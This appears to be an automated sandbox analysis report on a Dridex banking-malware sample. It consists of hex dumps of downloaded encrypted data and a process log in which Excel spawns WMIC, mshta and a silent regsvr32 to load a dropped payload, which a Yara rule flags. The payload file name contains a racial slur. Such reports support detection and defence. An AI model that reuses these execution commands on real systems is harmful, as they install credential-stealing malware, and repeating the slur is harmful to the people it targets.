                                          2021-12-23 16:00:51 UTC383INData Raw: 33 f5 08 be 06 09 b9 62 c2 e4 bf e8 fb 8f 88 61 86 b2 f6 95 d8 af f5 f7 b1 f5 85 ac 73 7d 82 59 c4 71 28 30 42 c8 d1 e1 4d 8b a6 b1 5c 03 04 a2 44 55 9e 41 4c 35 ec e5 f6 a2 75 f4 30 85 c6 33 8e 17 dc c7 61 e9 1a df c8 da e9 90 2a 37 59 25 95 d0 b8 75 28 c5 27 04 9c 8b 91 f5 b1 f8 28 1f 69 5a 5e 40 88 70 1e 3e 4d 8b a7 89 4e 40 2d a3 50 60 fe 9d ac 14 33 88 cd b2 2d b6 3e 48 81 67 9d ff de 45 99 c8 60 a0 8b 21 89 f3 70 d6 98 d3 b9 e5 d3 66 d8 af f9 6c 61 a7 cc 82 fd 1c c6 cc 4c ee 51 fd 88 70 5e 03 e8 1b bf ec 3f 84 2a 72 cc 5c 9f cd 75 3b 5d 6c 56 b2 2d 3a b1 7d 82 58 b4 71 70 88 44 44 ef c7 1d c9 31 9f a6 48 c7 69 38 6d f5 cd 99 da 90 81 6e 2c e7 f9 99 64 ca e4 a3 d1 80 88 4f c8 d1 24 c8 50 f2 14 2c c2 c5 65 c5 dd 99 41 4c b5 ef 74 29 5d 75 f4 b0 77 ed
                                          Data Ascii: 3bas}Yq(0BM\DUAL5u03a*7Y%u('(iZ^@p>MN@-P`3->HgE`!pflaLQp^?*r\u;]lV-:}XqpDD1Hi8mn,dO$P,eALt)]uw
                                          2021-12-23 16:00:51 UTC399INData Raw: 3c e6 10 26 23 59 cf ba b9 1a ee 4c 04 37 a0 1b 00 7f 84 95 9d 9f 42 5c 3b 9c fd 3d a3 a9 b5 3a 3c e6 14 f3 ac 56 e1 4b fa 1a e0 55 17 56 d8 03 70 22 9f c2 c6 bb cf d9 da d8 f9 3d a3 5e d7 91 f7 c1 4e a3 73 dd 21 e1 ba 1a df b0 d7 12 9f 1a 09 86 c4 1b c0 40 5a 4d b6 70 83 7d d3 01 3d bd 83 13 f0 2e 3f 61 86 cd dd 62 68 24 ef 92 8b 29 0d 8e c4 cb e7 af cb 9e f6 58 6e 1e a2 75 80 0d 1c 0a 17 75 71 94 15 02 fd 3e 2f 53 23 6e 29 6f a4 46 a3 9b ae 2c 8e 71 c2 58 7e 1d a2 75 04 68 63 d6 f3 5a 29 57 86 bd dd 76 6c 34 f6 4a 25 db 8f d0 70 c3 5c 9f 75 28 ad b5 1c 3d a3 76 15 c0 7c 75 e4 a3 e6 dc 72 85 09 6a e2 3c ef 8a 58 77 0c e4 00 7d ec c0 d6 34 b9 e5 00 25 cf 91 f5 b1 83 92 69 75 5a 64 30 39 09 84 fb c7 3f 56 00 6b d6 ac 9f c2 2e 24 02 c9 35 fb 6c 61 fb 01 41
                                          Data Ascii: <&#YL7B\;=:<VKUVp"=^Ns!@ZMp}=.?abh$)Xnuuq>/S#n)oF,qX~uhcZ)Wvl4J%p\u(=v|urj<Xw}4%iuZd09?Vk.$5laA
                                          2021-12-23 16:00:51 UTC415INData Raw: dd b2 d4 c1 e3 28 a6 c5 23 04 0d 3e e7 55 17 56 c8 56 d1 5a 2b 1c 54 ae 86 a6 c2 c1 4b a7 a3 01 5e 95 f7 37 e4 a2 5a 75 6d 45 85 a5 c7 b3 cd 65 8d a6 cc 66 c8 48 25 13 47 d0 af 6f 6d 41 55 77 e0 b3 2a 94 68 75 5a 78 82 42 2d 1f 62 c1 ca a7 a7 e1 c4 66 a8 c4 47 a4 08 91 da 78 f8 c7 f7 9a fd 35 ca 37 37 2e a7 a1 e5 0a b9 1a df b3 14 b5 1c 3f a4 42 14 f0 e1 95 b6 52 39 6e f7 b2 aa 3c 39 d5 24 c3 cf a8 ac 95 21 a5 b9 a4 33 ec f7 b6 72 90 90 92 2b 89 e5 eb 66 95 9e cf f8 3d a3 01 41 d5 3c 4d 38 c7 ee dc ee bb 42 6e 03 d0 06 86 c4 53 8f ce 08 c1 5b 9e c2 cc be 70 6c 59 2e bd f9 36 b8 36 e9 26 de 50 72 7d 6b 1b ca ca fd 04 24 ed f5 48 f0 ab 80 9f 42 4d 3f e7 fc ca af 9a bb f8 00 c3 cc 38 60 50 fc 02 e8 a5 a4 4b 8f 7a fd 76 df a0 62 cf 5c 2f d2 dd 41 b4 1c 41 f9
                                          Data Ascii: (#>UVVZ+TK^7ZumEefH%GomAUw*huZxB-bfGx577.?BR9n<9$!3r+f=A<M8BnS[plY.66&Pr}k$HBM?8`PKzvb\/AA
                                          2021-12-23 16:00:51 UTC431INData Raw: aa ff 61 d5 0c 45 e2 a6 5d 8c 88 a5 dd a5 ac 4b 94 3a 2b 10 8f f8 69 44 42 96 42 4d b6 67 bd 4d a3 76 f5 c0 3d b3 6d d7 0a 3c 17 04 25 3e ef 53 17 56 e0 2a 36 45 e3 4c a0 c3 56 da 2b ba 80 7e aa ff 69 d5 00 4d d4 2e ce 12 eb 7b 3c ff e2 53 47 56 a8 a4 ec 66 ac 4c d0 c3 5a 5c 6c 7c 36 40 92 85 ab bd 21 4b 30 c7 ea d2 f6 78 b9 1a df 3d e9 bd 90 4e 49 c5 86 c0 dd 61 42 7d b6 70 83 a9 c7 b6 78 af 1c d1 78 64 6f a6 15 02 05 3e e3 bf 0f 56 a4 9b 80 42 a0 38 60 d2 2f 38 c8 f3 d9 bc 2e 65 04 68 04 eb 6f 8c 6f 9d 21 7d 7a 07 e7 4b 47 56 b4 1b f4 73 2b 37 80 af cd c9 da 7c 85 c9 da a6 f6 b1 f8 4d 60 c7 fe 60 b3 2d f0 4a e0 c8 cb 41 56 4f 8e c7 d4 e7 d0 ac cd c1 da b0 79 07 a3 a6 f5 b1 81 18 fc 99 2a 75 01 7a c8 9e 7e cb cb 32 2b 8f a4 82 23 8d 5d 28 98 65 c5 26 03
                                          Data Ascii: aE]K:+iDBBMgMv=m<%>SV*6ELV+~iM.{<SGVfLZ\l|6@!K0x=NIaB}pxxdo>VB8`/8.ehoo!}zKGVs+7|M``-JAVOy*uz~2+#](e&
                                          2021-12-23 16:00:51 UTC447INData Raw: c6 3d 06 23 c3 b1 10 14 ba a3 07 b4 d3 79 f2 95 b5 c8 0d ad 76 1b b1 ce 76 c3 95 2b 18 4d ce 04 ce 3d c4 0a cb b1 4a 56 ba a3 49 06 d3 79 ea a6 bd c8 04 be 7e 1b c2 ce 7e c3 a6 33 20 4d 08 04 d6 3d 2f 2b d3 b1 19 56 d3 a3 0f e5 ec 79 f2 ae ce c8 0d c6 8f 1b ca d6 8f c3 ae 3b 31 4d 21 1d e7 3d f5 2b e4 b1 52 77 d3 a3 49 06 ec 79 34 cf ce c8 46 ef 8f 1b b1 d6 97 c3 95 33 39 4d f8 0c ef 3d ed 23 ec b1 5b 7f db a3 49 1f f4 79 2c e8 d6 c8 67 00 97 1b f3 18 97 c3 e8 75 39 4d 4a 46 ef 3d 50 4c ec b1 ad 98 db a3 e5 51 fc 79 ea ae de c8 fc ce 9f 1b 14 18 9f c3 e8 7d 41 4d 4a 5f f7 3d a3 76 f5 b1 f7 c1 e3 a3 e5 50 fc 79 b8 19 de c8 ca 31 9f 1b 7f 41 9f c3 5b 9e 41 4d b5 6f f7 3d a2 75 f4 b1 f7 c1 e3 a3 e5 50 fc 79 b8 19 de c8 ca 31 9f 1b 7f 41 9f c3 5b 9e 41 4d b5
                                          Data Ascii: =#yvv+M=JVIy~~3 M=/+Vy;1M!=+RwIy4F39M=#[Iy,gu9MJF=PLQy}AMJ_=vPy1A[AMo=uPy1A[AM
                                          2021-12-23 16:00:51 UTC463INData Raw: c9 17 bd 2a 0f d8 83 95 94 3a e2 44 e1 03 3a f4 30 c8 25 92 d6 c8 8d 59 ec 31 69 c2 5f 1c dd 84 aa cb 89 f7 42 d8 83 95 b4 6e 62 a4 e1 4f 6e 08 50 c9 24 12 ea c8 0c f9 cc e5 69 22 2c 1b dd 38 4a 2b 9d 2a 23 d8 82 95 b4 ee 42 44 60 03 4e a8 1c c9 f1 72 09 48 0d f9 cc 64 69 0e 40 e8 5c 84 c9 2b 9d 2b 42 0c 83 e1 b4 3a 62 a4 60 63 ee 28 4f c8 f1 12 0a 28 0c 79 cc 64 c9 42 60 e8 3d b8 ca 17 bd 0b 43 d8 82 14 34 6e e2 c3 e1 63 6d a8 1c 49 24 72 8a 47 d9 f9 ec e5 e9 22 60 fc 5d 84 aa 17 bc f7 0f d8 82 f5 b4 6e 42 c4 e1 83 6e 27 50 c9 a5 91 d6 c8 d9 79 ec e5 e9 0e 40 fc 3d 98 96 cb 9d ab 43 8c 82 15 b3 6d 62 c3 41 82 6e 27 50 a9 a5 72 0a 28 ed 79 ec 31 69 42 40 9c 29 84 96 17 bc 2b 0f 0c 63 e1 94 6e 61 44 60 63 ee a8 30 a9 05 92 8a 14 0d 59 cc 31 c9 22 e0 1b 29
                                          Data Ascii: *:D:0%Y1i_BnbOnP$i",8J+*#BD`NrHdi@\++B:b`c(O(ydB`=C4ncmI$rG"`]nBn'Py@=CmbAn'Pr(y1iB@)+cnaD`c0Y1")
                                          2021-12-23 16:00:51 UTC479INData Raw: dd 84 96 cb 9d f7 c3 0b 03 e1 b3 3a e2 c3 41 03 3a 27 30 c8 f1 92 8a 47 0d 78 cc e5 c9 c2 e0 9c 3d 98 ca cb 9d 2a 43 0c 82 e1 b4 ee 62 44 e1 4f 6d 08 d0 49 25 91 09 28 d9 59 cc 45 b5 c2 40 1b 5c 84 ca cb 9d 2a 43 0b 82 f5 b3 6e 42 c4 61 03 3a a8 4f c8 24 91 0a 14 8d f9 ec 65 69 c2 5f 9c 29 84 4a 4b 9d ab 0f 8c 83 95 80 6e 2e c3 41 03 ee f4 30 95 f1 12 ea 14 ed f9 6c 45 e8 0e 60 1b 5c b8 96 4a 3d f7 43 8c 83 15 80 ee 42 c4 60 82 6e 28 d0 c8 f1 91 ea 28 8d 45 cc 65 e8 0e 60 1b 29 38 4a 4b 3d f7 23 0c 63 f5 94 6e 62 c4 41 03 3a 28 30 49 05 12 d6 47 0d 59 ec 31 e8 41 5f 9c 5c b8 ca cb bc f7 23 0c 82 14 b3 3a e2 c4 60 82 ee f4 d0 a9 a5 12 0a c8 d9 f9 eb e5 b5 42 e0 1c 3d b7 ca 17 9d 0b 23 0c 4f 15 b4 6d 62 90 60 83 6d 28 1c a9 f1 12 09 48 0c 45 ec 64 e8 22 40
                                          Data Ascii: :A:'0Gx=*CbDOmI%(YE@\*CnBa:O$ei_)JKn.A0lE`\J=CB`n((Ee`)8JK=#cnbA:(0IGY1A_\#:`B=#Omb`m(HEd"@
                                          2021-12-23 16:00:51 UTC495INData Raw: 5f 1c 5c 98 c9 cb 89 ab 42 8c 63 e1 b3 4e 42 c4 e1 03 3a a8 4f 95 25 91 09 48 d9 78 6c 65 c9 0e 2c fc dd 98 4a 2b bd ab 42 d8 82 14 b3 3a 42 44 41 83 6d a8 50 95 25 5e 0a 48 ed 78 eb 45 e8 41 5f fc 29 b7 c9 2b 3d 2b 23 d8 82 e1 34 ee e2 44 2d 4f 6e f4 30 c9 25 91 0a 48 8d 45 ec 45 b5 0e 60 1b 5c b7 ca cb bd 2a 23 8c 83 14 b4 3a 42 90 41 4f ee 27 4f c8 25 92 d6 14 0c 45 eb 45 b5 41 5f 9c 29 98 ca 2b 3d ab 43 0c 83 f5 b3 3a 62 c4 2d 4f 4e a8 4f c9 05 72 8a 48 0c f9 6c 45 b5 41 e0 1c 5d 98 4a 2b 9d ab 23 0b 83 f5 b4 3a 61 a4 2d 83 ee f4 d0 a9 f1 12 0a 47 8d 59 b8 64 e8 42 5f 9c 29 98 ca 4a 89 2b 43 0b 03 e1 b4 4e 62 c4 e1 82 6e a8 d0 95 f1 5e ea c8 8d 78 cc 65 e8 22 e0 1b 29 b8 96 4b 3d ab c3 0b 03 14 34 3a 2e c3 60 4f 4e 28 50 49 a5 5e ea 48 8d 78 6c 31 e8
                                          Data Ascii: _\BcNB:O%Hxle,J+B:BDAmP%^HxEA_)+=+#4D-On0%HEE`\*#:BAO'O%EEA_)+=C:b-ONOrHlEA]J+#:a-GYdB_)J+CNbn^xe")K=4:.`ON(PI^Hxl1
                                          2021-12-23 16:00:51 UTC511INData Raw: e9 42 5f e8 29 b7 4a 4b 89 f7 42 0b 4f 14 b3 4e 42 90 e1 03 3a f4 30 c9 05 5e 09 47 0c 78 eb 65 e8 c2 5f 9c 29 84 4a 4a 9d 2a 0f 0b 03 f5 b3 6d 2e 90 41 03 3a 27 30 a9 24 5e 0a 47 0d 45 ec 64 c9 c2 40 fc 5d b8 aa cb bc ab 0f d8 03 15 94 6e 42 44 e1 63 4e 08 1c c8 24 72 09 28 0d 79 ec 64 69 42 5f 1b dd 84 4a 2b 3d 2a 23 ec 63 e1 b4 6e 61 a4 41 82 ee 28 30 49 a5 92 8a c8 d9 79 b8 64 e8 42 5f 1b 5c 84 96 4a bd 0b 23 ec 03 14 94 6e 62 c3 61 83 3a 28 30 95 05 12 d6 c8 8d 45 ec 65 e9 0e 40 1c 29 b7 4a 2b 3d ab 23 8c 63 e1 b4 ee 61 44 e1 03 3a 08 30 c9 05 72 8a 48 0c 59 ec 31 e9 42 e0 fc 29 98 c9 4b 3d 2a c3 0b 03 14 94 6d 2e 44 61 83 4e a8 1c 49 a5 5e 09 14 0c 59 b8 65 69 42 e0 9c 3d 38 96 4a bc 2a c3 8c 03 f5 34 4e 2e 90 60 82 6e 28 50 c9 a5 91 d6 48 d9 79 eb
                                          Data Ascii: B_)JKBONB:0^Gxe_)JJ*m.A:'0$^GEd@]nBDcN$r(ydiB_J+=*#cnaA(0IydB_\J#nba:(0Ee@)J+=#caD:0rHY1B)K=*m.DaNI^YeiB=8J*4N.`n(PHy
                                          2021-12-23 16:00:51 UTC527INData Raw: 47 0c 79 ec e5 69 c2 2c 1b 5d 38 4a 17 bd ab 0f d8 63 95 34 6d 62 a4 e1 82 4e a8 4f c8 24 92 0a 14 0c 59 ec 65 c9 0e 2c 1b 29 98 ca 4a bc 2a 23 8c 83 e1 b3 6e 42 44 61 82 4e 28 d0 c8 24 92 0a c8 d9 45 6c 45 b5 0e 40 1c 5d 84 ca 2b bd 2a c3 8c 83 15 b3 ee 2e a4 2d 82 4e 27 d0 c8 a5 91 8a 47 0d 78 eb 31 b5 42 60 1c 5c 38 ca 4a bd ab 23 d8 03 f5 b4 6e 61 90 60 03 6e f4 50 c8 05 92 ea c8 d9 59 eb 31 b5 0e 2c 1b 29 b8 ca 4b 89 2b 0f 0c 63 14 b3 4e 42 90 e1 03 6e 08 1c a9 a5 12 09 14 d9 f9 cc 45 b5 0e 2c e8 5c 84 c9 cb bc 2a 43 0b 82 14 34 ee e2 c3 2d 03 6e 27 50 c8 f1 72 0a 47 8d f9 cc 64 69 c2 e0 fc 5c b8 ca 4a 89 2b c3 d8 4f e1 b4 3a 2e c3 61 4f 4e f4 4f 49 25 72 09 47 0d 45 cc 65 e8 c2 2c 9c 5d b7 96 4b bc 0b 23 ec 03 14 34 4e 62 44 61 4f ee 28 50 95 24 72
                                          Data Ascii: Gyi,]8Jc4mbNO$Ye,)J*#nBDaN($ElE@]+*.-N'Gx1B`\8J#na`nPY1,)K+cNBnE,\*C4-n'PrGdi\J+O:.aONOI%rGEe,]K#4NbDaO(P$r
                                          2021-12-23 16:00:51 UTC543INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii:


                                          Code Manipulations

                                          Statistics

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Start time:16:59:15
                                          Start date:23/12/2021
                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                          Imagebase:0x13f510000
                                          File size:28253536 bytes
                                          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:17:00:36
                                          Start date:23/12/2021
                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\wbem\WMIC.exe" process call create "mshta.exe C:\ProgramData\NxeBChwsIhYFkIhhSsLtP.rtf
                                          Imagebase:0xff240000
                                          File size:566272 bytes
                                          MD5 hash:FD902835DEAEF4091799287736F3A028
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:17:00:37
                                          Start date:23/12/2021
                                          Path:C:\Windows\System32\mshta.exe
                                          Wow64 process (32bit):false
                                          Commandline:mshta.exe C:\ProgramData\NxeBChwsIhYFkIhhSsLtP.rtf
                                          Imagebase:0x13f460000
                                          File size:13824 bytes
                                          MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:17:00:40
                                          Start date:23/12/2021
                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                          Wow64 process (32bit):false
                                          Commandline:wmic process call create "regsvr32.exe -s C:\\ProgramData\fvfnigger.bin"
                                          Imagebase:0xff430000
                                          File size:566272 bytes
                                          MD5 hash:FD902835DEAEF4091799287736F3A028
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:17:00:41
                                          Start date:23/12/2021
                                          Path:C:\Windows\System32\regsvr32.exe
                                          Wow64 process (32bit):false
                                          Commandline:regsvr32.exe -s C:\\ProgramData\fvfnigger.bin
                                          Imagebase:0xff260000
                                          File size:19456 bytes
                                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:17:00:42
                                          Start date:23/12/2021
                                          Path:C:\Windows\SysWOW64\regsvr32.exe
                                          Wow64 process (32bit):true
                                          Commandline: -s C:\\ProgramData\fvfnigger.bin
                                          Imagebase:0xb20000
                                          File size:14848 bytes
                                          MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000B.00000002.1118714638.0000000072A61000.00000020.00020000.sdmp, Author: Joe Security
                                          Reputation:high

                                          Disassembly

                                          Code Analysis

                                          Reset < >